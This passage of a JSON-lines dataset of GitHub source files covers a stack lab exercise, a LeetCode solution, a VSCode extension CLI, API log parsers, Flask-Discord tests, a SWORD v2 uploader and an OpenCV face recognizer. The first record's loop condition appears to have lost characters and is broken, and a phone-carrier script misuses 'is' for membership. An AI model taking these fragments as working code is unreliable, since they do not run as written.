self.item.pop()\n def peek(self):\n tmp = self.item[self.size()-1]\n return tmp\nclass bowl:\n def __init__(self,a,b):\n self.w = int(a)\n self.f = int(b)\nx = list(input(\"Enter Input : \").split(\",\"))\ns = Stack()\nbl = []\nfor i in range(len(x)):\n # print(x[i].split()[0],x[i].split()[1])\n bl.append(bowl(x[i].split()[0],x[i].split()[1]))\ncount = 0\nwhile counts.peek().w and not s.isEmpty():\n print(s.pop().f)\n if s.isEmpty(): \n # print(\"push2\",bl[count])\n s.push(bl[count])\n break\n else:\n # print(\"push2\",bl[count])\n s.push(bl[count])\n count+=1\n\n\n","repo_name":"ppbasleng/CE-Classroom","sub_path":"Datastruc/lab3/lab3-2.py","file_name":"lab3-2.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3532256024","text":"#!/usr/bin/env python\n\n# coding=utf-8\n\n\"\"\"\nRuns an execution node.\n\"\"\"\n\nimport sys\n\nimport ConfigParser\n\nfrom suricate.analytics import exec_node\n\n__author__ = 'tmetsch'\n\nconfig = ConfigParser.RawConfigParser()\nconfig.read('app.conf')\n# MongoDB connection\nmongo = config.get('mongo', 'uri')\n# Rabbit part\nbroker = config.get('rabbit', 'uri')\n# SDK\nsdk = config.get('suricate', 'python_sdk')\n\n\nif __name__ == '__main__':\n if len(sys.argv) < 2:\n raise AttributeError('please provide a tenant id for this execution '\n 'node as first argument!')\n\n user = sys.argv[1]\n exec_node.ExecNode(mongo, broker, sdk, user)\n","repo_name":"tmetsch/suricate","sub_path":"bin/run_exec.py","file_name":"run_exec.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"3643928776","text":"#\n# @lc app=leetcode.cn id=2044 lang=python3\n#\n# [2044] 统计按位或能得到最大值的子集数目\n#\n\n# @lc code=start\nclass Solution:\n def countMaxOrSubsets(self, nums: List[int]) -> int:\n maxOr, cnt = 0, 0\n for i in range(1, 1 << len(nums)):\n orVal = reduce(\n or_, (num for j, num in enumerate(nums) if (i >> j) & 1), 0)\n if orVal > maxOr:\n maxOr, cnt = orVal, 1\n elif orVal == maxOr:\n cnt += 1\n return cnt\n# @lc code=end\n","repo_name":"boredcui/LeetCode","sub_path":"Medium/2044.统计按位或能得到最大值的子集数目.py","file_name":"2044.统计按位或能得到最大值的子集数目.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14473513606","text":"\"\"\"Main program entry point module that parses original CLI arguments\"\"\"\n\nimport sys\nimport logging\nfrom getpass import getuser\nfrom typing import List\n\nimport configargparse\nfrom fuzzywuzzy import process\nfrom rich.console import Console\n\nfrom pyvem._util import iso_now, resolved_path\nfrom pyvem._editor import SupportedEditorCommands\n\nfrom pyvem.commands.commands import _COMMAND_NAMES\nfrom pyvem.commands.commands import _COMMAND_NAMES_AND_ALIASES\nfrom pyvem.commands.commands import get_command_obj\n\nfrom pyvem._command import Command\nfrom pyvem._config import _PROG, rich_theme\nfrom pyvem._containers import parsed_connection_parts\nfrom pyvem._logging import get_rich_logger\n\n_CONSOLE = Console(theme=rich_theme)\n_LOGGER = get_rich_logger(__name__, console=_CONSOLE)\n_FUZZYISH_COMMAND_THRESHOLD = 50\n_TMP_OUTPUT_DIR = f'/tmp/{getuser()}-{_PROG}-{iso_now()}'\n\n\ndef get_similar_commands(command: str) -> List[str]:\n \"\"\"\n Perform a fuzzy check for similar command names to a given command. Only\n values meeting or exceeding the _FUZZYISH_COMMAND_THRESHOLD are returned.\n\n Arguments:\n command\n\n Returns:\n A list of fuzzy matches that meet a pre-determiend threshold.\n \"\"\"\n return [x[0] for x in process.extract(query=command,\n choices=_COMMAND_NAMES_AND_ALIASES)\n if x[1] > _FUZZYISH_COMMAND_THRESHOLD]\n\n\ndef create_main_parser() -> configargparse.ArgParser:\n \"\"\"Creates and returns the main parser for vem's CLI.\"\"\"\n #\n # setup the parser\n #\n parser_kwargs = {\n 'usage': f'{_PROG} <{\"|\".join(_COMMAND_NAMES)}> [options]\\n\\n'\n 'For help about a specific command:\\n\\t'\n f'[example]{_PROG} help [/]',\n 'add_help': False,\n 'default_config_files': ['.vemrc', '~/.vemrc', '~/.config/.vemrc',\n '.vemrc.yml', '~/.vemrc.yml',\n '~/.config/.vemrc.yml'],\n 'prog': _PROG,\n 'description': 'VSCode CLI helper for editors and extensions'\n }\n\n parser = configargparse.ArgumentParser(**parser_kwargs)\n\n #\n # setup the parser groups\n #\n required_named = parser.add_argument_group('required named arguments')\n optional_named = parser.add_argument_group('optional named arguments')\n optional = parser.add_argument_group('optional arguments')\n\n #\n # setup positional arguments\n #\n parser.add_argument('command',\n nargs='?',\n choices=_COMMAND_NAMES.append(None),\n help=f'The main {_PROG} command to execute.')\n\n parser.add_argument('args',\n nargs='*',\n default=[],\n help='The command arguments.')\n\n #\n # setup required named arguments\n #\n required_named.add_argument('-h', '--ssh-host',\n default='',\n required=True,\n type=parsed_connection_parts,\n help='Specify a SSH host in the form '\n '[user@]server[:port].')\n\n #\n # setup optional named arguments\n #\n optional_named.add_argument('-g', '--ssh-gateway',\n default='',\n required=False,\n type=parsed_connection_parts,\n help='Specify a SSH gateway in the form '\n '[user@]server[:port].')\n\n optional_named.add_argument('-o', '--output-dir',\n default=_TMP_OUTPUT_DIR,\n type=resolved_path,\n help='The directory where the extensions will '\n 'be downloaded.')\n\n #\n # setup optional arguments\n #\n optional.add_argument('--help',\n action='store_true',\n help='Show help and exit.')\n\n optional.add_argument('-V', '--version',\n action='store_true',\n default=False,\n help='Show version and exit.')\n\n optional.add_argument('--no-cleanup',\n action='store_true',\n default=False,\n help='Do not remove temporary downloads on the '\n 'local machine.')\n\n #\n # Add verbosity argument option group\n #\n log_level = optional.add_mutually_exclusive_group()\n optional.set_defaults(log_level=logging.INFO)\n log_level.add_argument('-v', '--verbose',\n action='store_const',\n dest='log_level',\n const=logging.DEBUG,\n help='Show debug output.')\n\n log_level.add_argument('-q', '--quiet',\n action='store_const',\n dest='log_level',\n const=logging.ERROR,\n help='Show only the minimally necessary output.')\n\n #\n # Add the target editor argument option group\n #\n target = optional.add_mutually_exclusive_group()\n optional.set_defaults(target=SupportedEditorCommands.code)\n target.add_argument('--code',\n action='store_const',\n dest='target',\n const=SupportedEditorCommands.code,\n help='(default) Use VSCode as the target editor.')\n\n target.add_argument('--insiders',\n action='store_const',\n dest='target',\n const=SupportedEditorCommands.insiders,\n help='Use VSCode Insiders as the target editor.')\n\n target.add_argument('--exploration',\n action='store_const',\n dest='target',\n const=SupportedEditorCommands.code,\n help='Use VSCode Exploration as the target editor.')\n\n target.add_argument('--codium',\n action='store_const',\n dest='target',\n const=SupportedEditorCommands.codium,\n help='Use VSCodium as the target editor.')\n\n return parser\n\n\ndef main():\n \"\"\"Main entry point for the program\"\"\"\n\n # get and parse the program arguments\n parser = create_main_parser()\n args, remainder = parser.parse_known_args()\n\n # For now, add any remainder arguments to the extra args that we store\n # in a list after plucking the command.\n args.args.extend(remainder)\n\n # Add the remote output directory (doesn't need to be set by user)\n args.remote_output_dir = _TMP_OUTPUT_DIR\n\n # If we got no command, make sure the user didn't just ask for the version,\n # which would be the only case where it's valid to provide an option\n # without providing a command. If this has happened, we'll set the command\n # to be 'version' so the command parser is satisfied and can pass that\n # command along to the VersionCommand handler.\n # TODO: There's probably a better way to handle this\n if not args.command:\n if args.version:\n args.command = 'version'\n else:\n _CONSOLE.print(parser.format_help(), highlight=False)\n sys.exit(1)\n\n # Check if the provided command matches one of the registered commands.\n # If so, pass it along to that command object to run. Otherwise, print\n # an error message and exit.\n command = get_command_obj(args.command)\n\n # If we got a valid command, invoke the command behavior\n if isinstance(command, Command):\n command.invoke(parser, args)\n\n # Otheriwse, check if the user just requested to show help. If so, print\n # the help info.\n elif args.help:\n _CONSOLE.print(parser.format_help(), highlight=False)\n\n # Otherwise, the user gave an invalid request.\n else:\n _CONSOLE.print(f'[error]\"{args.command}\" is not a valid {_PROG} '\n 'command[/].\\n')\n\n # Check for similar commands. If any similar-enough matches were found,\n # suggest them.\n similar_commands = get_similar_commands(args.command)\n if similar_commands:\n _CONSOLE.print('Maybe you meant one of these commands?\\n\\t'\n f'[i]{\", \".join(similar_commands)}\\n[/]')\n\n # Whether or not any similar commands were found, print the usage,\n # along with an extra empty line to create a little spacing.\n _CONSOLE.print(parser.usage + '\\n', highlight=False)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"taylor-jones/pyvem","sub_path":"pyvem/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10503017211","text":"# -------------------------------------------------------------------\n# -------------------------------------------------------------------\n\n# DESCRIPTION\n\"\"\"\n\nThis script contains a collection of functions that are used\nby the LOC API log scripts.\n\nAssumptions:\n\n- All LOC API log scripts are stored in the same folder\n- There is both an 'input' and 'output' folder in the workspace\n- The workspace 'config' subfolder contains all CSV config files\n\n\"\"\"\n# -------------------------------------------------------------------\n# -------------------------------------------------------------------\n\n# IMPORT MODULES\n\nimport csv\nimport os\nimport platform\nimport psycopg2\nimport time\n\n# -------------------------------------------------------------------\n# -------------------------------------------------------------------\n\n# FUNCTIONS\n\n\n# Parse an API key out of a log file line, where\n# the 'apikey=' parameter is used. API keys appended to\n# the end of a log file line are parsed in the API specific script.\ndef apiKeyParameter(logLine):\n\n # The log file line split on & to create a list\n parameterList = logLine.split(\"&\")\n # The substring to identify the apikey parameter\n substringVal = \"apikey=\"\n # The single list item that contains the substring\n apiKey = [i for i in parameterList if substringVal in i]\n apiKeyStr = str(apiKey)\n # The location index in the list item of the substring\n paramIndex = apiKeyStr.index(\"apikey=\") + 7\n apiKeyStrTrim = apiKeyStr[paramIndex:]\n\n if \" \" in apiKeyStrTrim:\n blankSpaceIndex = apiKeyStrTrim.index(\" \")\n apiKeyStrTrim2 = apiKeyStrTrim[0:blankSpaceIndex]\n else:\n apiKeyStrTrim2 = apiKeyStrTrim\n\n # Remove special characters (brackets, commas etc)\n alphaNum = list([val for val in apiKeyStrTrim2 if val.isalpha() or val.isnumeric()])\n apiKeyAlphaNum = \"\".join(alphaNum)\n\n if apiKeyAlphaNum == \"\":\n apiKeyAlphaNum = \"API key parameter had no value\"\n\n return apiKeyAlphaNum\n\n\n# Assemble the string values into a comma delimited string to write to CSV\ndef assembleList(\n ipAddress,\n apiKey,\n isoTime,\n method,\n protocol,\n statusCode,\n resource,\n responseFormat,\n parameters,\n logEntry,\n fileName,\n):\n\n tableEntryString = (\n isoTime\n + \",\"\n + ipAddress\n + \",\"\n + apiKey\n + \",\"\n + method\n + \",\"\n + protocol\n + \",\"\n + statusCode\n + \",\"\n + resource\n + \",\"\n + responseFormat\n + \",\"\n + logEntry\n + \",\"\n + parameters\n + \"\\n\"\n )\n\n writeToFile(tableEntryString, fileName)\n\n\n# Convert the date timestamp in the log file to a new format\ndef convertTimeStamp(timestamp):\n\n calendar = {\n \"Jan\": \"01\",\n \"Feb\": \"02\",\n \"Mar\": \"03\",\n \"Apr\": \"04\",\n \"May\": \"05\",\n \"Jun\": \"06\",\n \"Jul\": \"07\",\n \"Aug\": \"08\",\n \"Sep\": \"09\",\n \"Oct\": \"10\",\n \"Nov\": \"11\",\n \"Dec\": \"12\",\n }\n\n day = timestamp[0:2]\n month = timestamp[3:6]\n year = timestamp[7:11]\n time = timestamp[12:20]\n\n monthNum = calendar[month]\n\n isoDate = year + \"-\" + monthNum + \"-\" + day + \"T\" + time + \"-\" + \"08:00\"\n\n return isoDate\n\n\n# Convert specific columns from the config CSV files to dictionaries\ndef csvToDict(configFile, dictName, colNum):\n\n with open(configFile, \"r\") as apiConfig:\n next(apiConfig) # skip the CSV header\n data = csv.reader(apiConfig)\n dictName = {rows[colNum]: 0 for rows in data}\n\n return dictName\n\n\n# Confirm that the provided string is listed in the\n# dictionary of allowed values\ndef valueRangeChecker(strValue, dictValues):\n\n validFormat = False\n\n for key in dictValues:\n if key == strValue and key != \"\":\n validFormat = True\n break\n else:\n validFormat = False\n\n return validFormat\n\n\n# Only parse lines from the logs where an API\n# resource is listed.\ndef lineChecker(logLine, resDict):\n\n validLine = False\n\n for key in resDict:\n if key in logLine and key != \"\":\n validLine = True\n break\n else:\n validLine = False\n\n return validLine\n\n\n# Assemble a comma delimited string containing a boolean value for\n# each parameter used in an API request\ndef parseParameters(\n ipAddress,\n apiKey,\n isoTime,\n method,\n protocol,\n statusCode,\n resource,\n responseFormat,\n parameters,\n logEntry,\n fileName,\n paramDt,\n):\n\n parameterStrList = \"\"\n\n for key in paramDt:\n if key in parameters:\n paramVal = \"Y\"\n parameterStrList += paramVal + \",\"\n else:\n paramVal = \"\"\n parameterStrList += paramVal + \",\"\n\n if parameterStrList.endswith(\",\"):\n parameterStrList = parameterStrList[:-1]\n\n assembleList(\n ipAddress,\n apiKey,\n isoTime,\n method,\n protocol,\n statusCode,\n resource,\n responseFormat,\n parameterStrList,\n logEntry,\n fileName,\n )\n\n\n# Determine if script is running on Windows or Linux\ndef platformCheck():\n\n pltFrm = platform.system()\n\n # Define which slash to use based on platform\n if pltFrm == \"Windows\":\n slash = \"\\\\\"\n elif pltFrm == \"Linux\":\n slash = \"/\"\n\n return slash\n\n\n# Create a list of subfolders containing log files to iterate through.\ndef subfolderCheck(parentFolder):\n\n subList = [f.name for f in os.scandir(parentFolder) if f.is_dir()]\n\n return subList\n\n\n# Write the file header to a result CSV file\ndef writeLogHeaderToCsv(dParameters, logTableFile):\n\n headerString = \"log_datetime,ip_address,api_key,method,\"\n headerString += \"protocol,status_code,resource,format,log_entry,\"\n\n for key in dParameters:\n if key != \"\":\n headerString += str(key) + \",\"\n\n csvHeader = headerString.rstrip(\",\")\n csvHeader += \"\\n\"\n\n logTableFile.write(csvHeader)\n\n\n# Write the final CSV entry to file\ndef writeToFile(outputString, logOutputFile):\n\n logOutputFile.write(outputString)\n","repo_name":"bcgov/ols-metrics","sub_path":"py/logFunctions.py","file_name":"logFunctions.py","file_ext":"py","file_size_in_byte":6137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39529292640","text":"from turtle import Turtle, Screen\r\nimport random\r\n\r\ncolors = [x for x in range(256)]\r\n\r\n\r\ndef get_random_rgb():\r\n r = random.choice(colors)\r\n g = random.choice(colors)\r\n b = random.choice(colors)\r\n return r, g, b\r\n\r\n\r\nif __name__ == '__main__':\r\n t = Turtle()\r\n screen = Screen()\r\n \"\"\"for i in range(24):\r\n drawing_turtle.left(15)\r\n drawing_turtle.fd(100)\r\n drawing_turtle.left(45)\r\n drawing_turtle.fd(10)\r\n drawing_turtle.left(90)\r\n drawing_turtle.fd(10)\r\n drawing_turtle.left(45)\r\n drawing_turtle.fd(100)\r\n \"\"\"\r\n \"\"\"for i in range(0, 100, 10):\r\n t.fd(10)\r\n if t.pencolor() == \"black\":\r\n t.pencolor(\"white\")\r\n else:\r\n t.pencolor(\"black\")\"\"\"\r\n \"\"\"total_degrees = 360\r\n\r\n for i in range(3, 11):\r\n turn_angle = total_degrees / i\r\n t.pencolor(random.choice(COLORS))\r\n for turns in range(i):\r\n t.fd(100)\r\n t.left(turn_angle)\r\n\"\"\"\r\n\r\n \"\"\" step_size = 40\r\n angles = [0, 90, 180, 270]\r\n t.pensize(10)\r\n t.speed(10)\r\n screen.colormode(255)\r\n for i in range(1000):\r\n t.setheading(random.choice(angles))\r\n t.pencolor(get_random_rgb())\r\n t.forward(step_size) \"\"\"\r\n\r\n\r\ndef draw_spirograph(gap_size):\r\n screen.colormode(255)\r\n t.speed(\"fastest\")\r\n for i in range(int(360 / gap_size)):\r\n t.left(gap_size)\r\n t.pencolor(get_random_rgb())\r\n t.circle(100)\r\n\r\n\r\ndraw_spirograph(3)\r\n\r\nscreen.exitonclick()\r\n","repo_name":"usvarma/100DaysOfCodePython","sub_path":"Day18/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21817189332","text":"from types import SimpleNamespace\n\nimport flask\nimport pytest\nfrom flask import jsonify\nfrom werkzeug.exceptions import abort\n\nfrom flask_discord import DiscordOAuth2Session\nfrom flask_discord.models import User, UserConnection\nfrom flask_discord.models.base import DiscordModelsBase\n\n\n@pytest.fixture\ndef user_payload():\n return {'id': 1,\n 'username': 'test_username',\n 'discriminator': '1000',\n 'avatar': 'test_avatar',\n 'bot': False,\n 'mfa_enabled': False,\n 'locale': 'test_locale',\n 'verified': False,\n 'email': 'test_email',\n 'flags': 100,\n 'premium_type': 100}\n\n\n@pytest.fixture\ndef user_full(user_payload):\n return User(user_payload)\n\n\n@pytest.fixture\ndef user_connection_payload():\n return {'id': 1,\n 'name': 'test_name',\n 'type': 'test_type',\n 'revoked': False,\n 'verified': False,\n 'friend_sync': False,\n 'show_activity': False,\n 'visibility': 1}\n\n\n@pytest.fixture\ndef user_connection(user_connection_payload):\n return UserConnection(user_connection_payload)\n\n\n@pytest.fixture\ndef app(monkeypatch):\n app = flask.Flask(__name__)\n app.config['TESTING'] = True\n app.secret_key = b\"%\\xe0'\\x01\\xdeH\\x8e\\x85m|\\xb3\\xffCN\\xc9g\"\n monkeypatch.setenv('OAUTHLIB_INSECURE_TRANSPORT', 'true')\n\n app.config[\"DISCORD_CLIENT_ID\"] = 490732332240863233\n app.config[\"DISCORD_CLIENT_SECRET\"] = \"TEST_DISCORD_CLIENT_SECRET\"\n app.config[\"DISCORD_BOT_TOKEN\"] = \"TEST_DISCORD_BOT_TOKEN\"\n app.config[\"DISCORD_REDIRECT_URI\"] = \"http://127.0.0.1:5000/callback\"\n\n discord = DiscordOAuth2Session(app)\n\n @app.route(\"/me/\")\n def me():\n user = discord.fetch_user()\n if user is None:\n abort(401)\n\n return jsonify(\n user_name=user.name,\n avatar_url=user.avatar_url or user.default_avatar_url,\n is_avatar_animated=user.is_avatar_animated\n )\n\n @app.route(\"/me/connections/\")\n def my_connections():\n user = discord.fetch_user()\n connections = discord.fetch_connections()\n if user is None or connections is None:\n abort(401)\n\n return jsonify(\n user_name=user.name,\n connections=[f\"{connection.name} - {connection.type}\" for connection in connections]\n )\n\n @app.route(\"/me/guilds/\")\n def user_guilds():\n guilds = discord.fetch_guilds()\n guilds = guilds.return_value\n\n return \"
\".join([f\"[ADMIN] {g.name}\" if g.permissions.administrator else g.name for g in guilds])\n\n @app.route(\"/add_to//\")\n def add_to_guild(guild_id):\n user = discord.fetch_user()\n return user.add_to_guild(guild_id)\n\n return app\n\n\ndef test_get_user_info_unauthorized(app, user_full, mocker):\n with app.app_context():\n app.discord = SimpleNamespace()\n app.discord.authorized = False\n\n mocker.patch('flask.current_app', return_value=app)\n\n mocker.patch.object(User, 'get_from_cache', return_value=None)\n mocker.patch.object(User, 'fetch_from_api', return_value=None)\n\n with app.test_client() as client:\n response = client.get('/me/')\n assert response.status_code == 401\n\n\ndef test_get_user_info_authorized(app, user_full, mocker):\n with app.app_context():\n app.discord = SimpleNamespace()\n app.discord.authorized = True\n\n mocker.patch('flask.current_app', return_value=app)\n\n mocker.patch.object(User, 'get_from_cache', return_value=user_full)\n mocker.patch.object(User, 'fetch_from_api', return_value=user_full)\n\n with app.test_client() as client:\n response = client.get('/me/')\n assert response.status_code == 200\n assert response.json['user_name'] == user_full.name\n assert response.json['avatar_url'] == user_full.avatar_url\n assert response.json['is_avatar_animated'] == user_full.is_avatar_animated\n\n\ndef test_get_user_connections_unauthorized(app, user_full, mocker):\n with app.app_context():\n app.discord = SimpleNamespace()\n app.discord.authorized = False\n\n mocker.patch('flask.current_app', return_value=app)\n\n mocker.patch.object(User, 'get_from_cache', return_value=None)\n mocker.patch.object(User, 'fetch_from_api', return_value=None)\n mocker.patch.object(UserConnection, 'fetch_from_api', return_value=None)\n\n with app.test_client() as client:\n response = client.get('/me/connections/')\n assert response.status_code == 401\n\n\ndef test_get_user_connections_authorized(app, user_full, user_connection, mocker):\n with app.app_context():\n app.discord = SimpleNamespace()\n app.discord.authorized = True\n app.discord.user_id = user_full.id\n app.discord.users_cache = {user_full.id: user_full}\n\n mocker.patch('flask.current_app', return_value=app)\n\n mocker.patch.object(User, 'get_from_cache', return_value=user_full)\n mocker.patch.object(User, 'fetch_from_api', return_value=user_full)\n mocker.patch.object(DiscordModelsBase, 'fetch_from_api', return_value=[user_connection])\n\n with app.test_client() as client:\n response = client.get('/me/connections/')\n assert response.status_code == 200\n assert response.json['user_name'] == user_full.name\n assert response.json['connections'] == [f\"{user_connection.name} - {user_connection.type}\"]","repo_name":"RomanGrankin1/-Flask-Discord","sub_path":"tests/integration/test_get_user_info.py","file_name":"test_get_user_info.py","file_ext":"py","file_size_in_byte":5579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12528103009","text":"smart = ['13','14','20','21','28','29','30']\ntnt = ['08','09','10','11','12','18','19']\nsun = ['22','23','32','33']\nglobe = ['15','16','17','25','26','27']\ntm = ['03','04','05','06','07']\nred = ['01','02','24']\n\n\n\nnum=input(\"Enter the number: \")\n\nwhile num[:2] != \"09\" or len(num) > 11 or len(num) < 11 or num.isdigit() is False or num.isspace() is True:\n num = input(\"Mobile number must start with '09'\\nMobile number must ONLY contain 11-digits\\n>>Enter the number: \")\n\nif num[2:4] is smart:\n print(str(num)+\"\\tSMART\")\nif num[2:4] in tnt:\n print(str(num)+\"\\tTNT\")\nif num[2:4] in sun:\n print(str(num)+\"\\tSUN\")\nif num[2:4] in globe:\n print(str(num)+\"\\tGLOBE\")\nif num[2:4] in tm:\n print(str(num)+\"\\tTM\")\nif num[2:4] in red:\n print(str(num)+\"\\tRED\")\n","repo_name":"ExtraRixe/Prometheus","sub_path":"Python/IT5 Activties/Act2.6.py","file_name":"Act2.6.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41457936500","text":"#!/usr/bin/env python3\n\"\"\"\nRetrieve and disseminate files and metadata to a server using SWORD v2\n\"\"\"\n\nimport logging\nimport sys\nimport sword2\nfrom errors import DisseminationError\nfrom uploader import Uploader\n\n\nclass SwordV2Uploader(Uploader):\n \"\"\"Dissemination logic for SWORD v2\"\"\"\n # using UCamApollo DSpace 7 as hard-coded logic for now.\n\n def upload_to_platform(self):\n \"\"\"Upload work in required format to SWORD v2\"\"\"\n\n # Fast-fail if credentials for upload are missing\n try:\n user_name = self.get_credential_from_env(\n 'cam_ds7_user', 'SWORD v2')\n user_pass = self.get_credential_from_env('cam_ds7_pw', 'SWORD v2')\n except DisseminationError as error:\n logging.error(error)\n sys.exit(1)\n\n # Metadata file format TBD: use CSV for now\n metadata_bytes = self.get_formatted_metadata('csv::thoth')\n # Can't continue if no PDF file is present\n try:\n pdf_bytes = self.get_publication_bytes('PDF')\n except DisseminationError as error:\n logging.error(error)\n sys.exit(1)\n\n # Convert Thoth work metadata into SWORD v2 format\n sword_metadata = self.parse_metadata()\n\n # Set up SWORD v2 endpoint connection\n conn = sword2.Connection(\n service_document_iri=\"https://dspace7-back.lib.cam.ac.uk/server/swordv2/collection/1810/339712\",\n user_name=user_name,\n user_pass=user_pass,\n # SWORD2 library doesn't handle timeout-related errors gracefully and large files\n # (e.g. 50MB) can't be fully uploaded within the 30-second default timeout.\n # Allow lots of leeway. (This otherwise matches the default `http_impl`.)\n http_impl=sword2.http_layer.HttpLib2Layer(timeout=120.0)\n )\n\n try:\n receipt = conn.create(\n col_iri=\"https://dspace7-back.lib.cam.ac.uk/server/swordv2/collection/1810/339712\",\n # Hacky workaround for an issue with mishandling of encodings within sword2 library,\n # which meant metadata containing special characters could not be submitted.\n # Although the `metadata_entry` parameter ought to be of type `Entry`, sending a\n # `str` as below triggers no errors. Ultimately it's passed to `http/client.py/_encode()`,\n # which defaults to encoding it as 'latin-1'. Pre-emptively encoding/decoding it here\n # seems to mean that the string sent to the server is in correct utf-8 format.\n metadata_entry=str(sword_metadata).encode(\n 'utf-8').decode('latin-1'),\n in_progress=True,\n )\n except sword2.exceptions.Forbidden:\n logging.error(\n 'Could not connect to SWORD v2 server: authorisation failed')\n sys.exit(1)\n\n if receipt.code != 201:\n logging.error(\n 'Error uploading item data to SWORD v2')\n sys.exit(1)\n\n try:\n pdf_receipt = conn.add_file_to_resource(\n edit_media_iri=receipt.edit_media,\n payload=pdf_bytes,\n # Filename TBD: use work ID for now\n filename='{}.pdf'.format(self.work_id),\n mimetype='application/pdf',\n in_progress=True,\n )\n except sword2.exceptions.Forbidden:\n logging.error(\n 'Could not connect to SWORD v2 server: authorisation failed')\n sys.exit(1)\n\n if pdf_receipt.code != 201:\n logging.error(\n 'Error uploading PDF file to SWORD v2')\n sys.exit(1)\n\n try:\n metadata_receipt = conn.add_file_to_resource(\n edit_media_iri=receipt.edit_media,\n payload=metadata_bytes,\n # Filename TBD: use work ID for now\n filename='{}.csv'.format(self.work_id),\n mimetype='text/csv',\n in_progress=True,\n )\n except sword2.exceptions.Forbidden:\n logging.error(\n 'Could not connect to SWORD v2 server: authorisation failed')\n sys.exit(1)\n\n if metadata_receipt.code != 201:\n logging.error(\n 'Error uploading metadata file to SWORD v2')\n sys.exit(1)\n\n logging.info(\n 'Successfully uploaded to SWORD v2 at {}'.format(receipt.location))\n\n def parse_metadata(self):\n \"\"\"Convert work metadata into SWORD v2 format\"\"\"\n work_metadata = self.metadata.get('data').get('work')\n sword_metadata = sword2.Entry(\n # All fields are non-mandatory and any None values are ignored on ingest\n # (within Apollo DSpace 7 - yet to test other SWORD2-based platforms)\n # Some of the below fields do not appear to be stored/\n # correctly displayed by Apollo, although they are valid within SWORD2\n title=work_metadata.get('fullTitle'),\n dcterms_publisher=self.get_publisher_name(),\n dcterms_issued=work_metadata.get('publicationDate'),\n dcterms_description=work_metadata.get('longAbstract'),\n dcterms_identifier=work_metadata.get('doi'),\n dcterms_license=work_metadata.get('license'),\n dcterms_tableOfContents=work_metadata.get('toc'),\n )\n # Workaround for adding repeatable fields\n for contributor in [n.get('fullName') for n in work_metadata.get('contributions') if n.get('mainContribution') == True]:\n sword_metadata.add_field(\"dcterms_contributor\", contributor)\n for subject in [n.get('subjectCode') for n in work_metadata.get('subjects')]:\n sword_metadata.add_field(\"dcterms_subject\", subject)\n for isbn in [n.get('isbn').replace(\n '-', '') for n in work_metadata.get('publications') if n.get('isbn') is not None]:\n sword_metadata.add_field(\"dcterms_identifier\", isbn)\n for language in [n.get('languageCode') for n in work_metadata.get('languages')]:\n sword_metadata.add_field(\"dcterms_language\", language)\n\n return sword_metadata\n","repo_name":"thoth-pub/thoth-dissemination","sub_path":"swordv2uploader.py","file_name":"swordv2uploader.py","file_ext":"py","file_size_in_byte":6244,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"27776951740","text":"import cv2\nimport pickle \nimport numpy as np\n\ncascade = cv2.CascadeClassifier(\"haarcascade_frontalface_alt2.xml\")\nface_recognizer = cv2.face.LBPHFaceRecognizer_create()\nface_recognizer.read(\"training.yml\")\nlabel_id = pickle.load(open(\"labels.pickle\", \"rb\"))\nlabel_id = {v: k for k,v in label_id.items()}\n\ndef detect_faces(cascade, image, scaleFactor = 1.2):\n\t# Making a copy of image\n\timage_copy = image.copy() \n\t\n\t# Converting to gray image\n\tgray = cv2.cvtColor(image_copy, cv2.COLOR_BGR2GRAY) \n\n\t# Detect faces using OpenCV Cascades\n\tfaces = cascade.detectMultiScale(gray, scaleFactor=scaleFactor, minNeighbors=5); \n\n\t# Plotting rectangle over faces\n\tfor (x, y, w, h) in faces:\n\t\tcv2.rectangle(image_copy, (x, y), (x+w, y+h), (0, 255, 0), 2) \n\n\tif len(faces) > 0:\n\t\treturn image_copy, gray[y:y+h, x:x+w]\n\telse:\n\t\treturn image_copy, None\n\ndef draw_text(img, text, x=400, y=300):\n cv2.putText(img, text, (x, y), cv2.FONT_HERSHEY_PLAIN, 1.5, (0, 255, 0), 2)\n\n#video = cv2.VideoCapture(0)\nurl = \"http://192.168.42.129:8080/shot.jpg\"\nimport requests\n\nwhile True:\n\timgResp=requests.get(url)\n\timgNp=np.array(bytearray(imgResp.content),dtype=np.uint8)\n\tframe=cv2.imdecode(imgNp,-1)\n\n\t#ret, frame = video.read()\n\tface_detected, roi = detect_faces(cascade, frame)\n\tif roi is not None:\n\t\tid_, conf = face_recognizer.predict(roi)\n\t\tprint(label_id[id_], conf)\n\t\tdraw_text(face_detected, label_id[id_])\n\tcv2.imshow('face', face_detected)\n\tif cv2.waitKey(1) & 0xFF == ord('q'):\n\t\tbreak \n#video.release()\ncv2.destroyAllWindows()\n","repo_name":"ni3-k/Game-of-Thrones-Recognizer","sub_path":"face.py","file_name":"face.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24845717828","text":"import logging\nfrom logging_config import configure_logger\nimport time\nfrom datetime import datetime\nimport json\nfrom urllib.parse import urlencode\nimport httpx\nfrom pathlib import Path\n\nfrom download_common import (\n save_to_pq,\n save_to_db,\n initial_report,\n final_report,\n SERVERS,\n API_KEY,\n)\nfrom download_async import download_many as download_readings_async\nfrom download_concur import download_many as download_readings_concur\nfrom download_seq import download_many as download_readings_seq\nfrom validate_reading import validate_reading\n\nconfigure_logger()\n\nPROJECT_DIR_PATH = 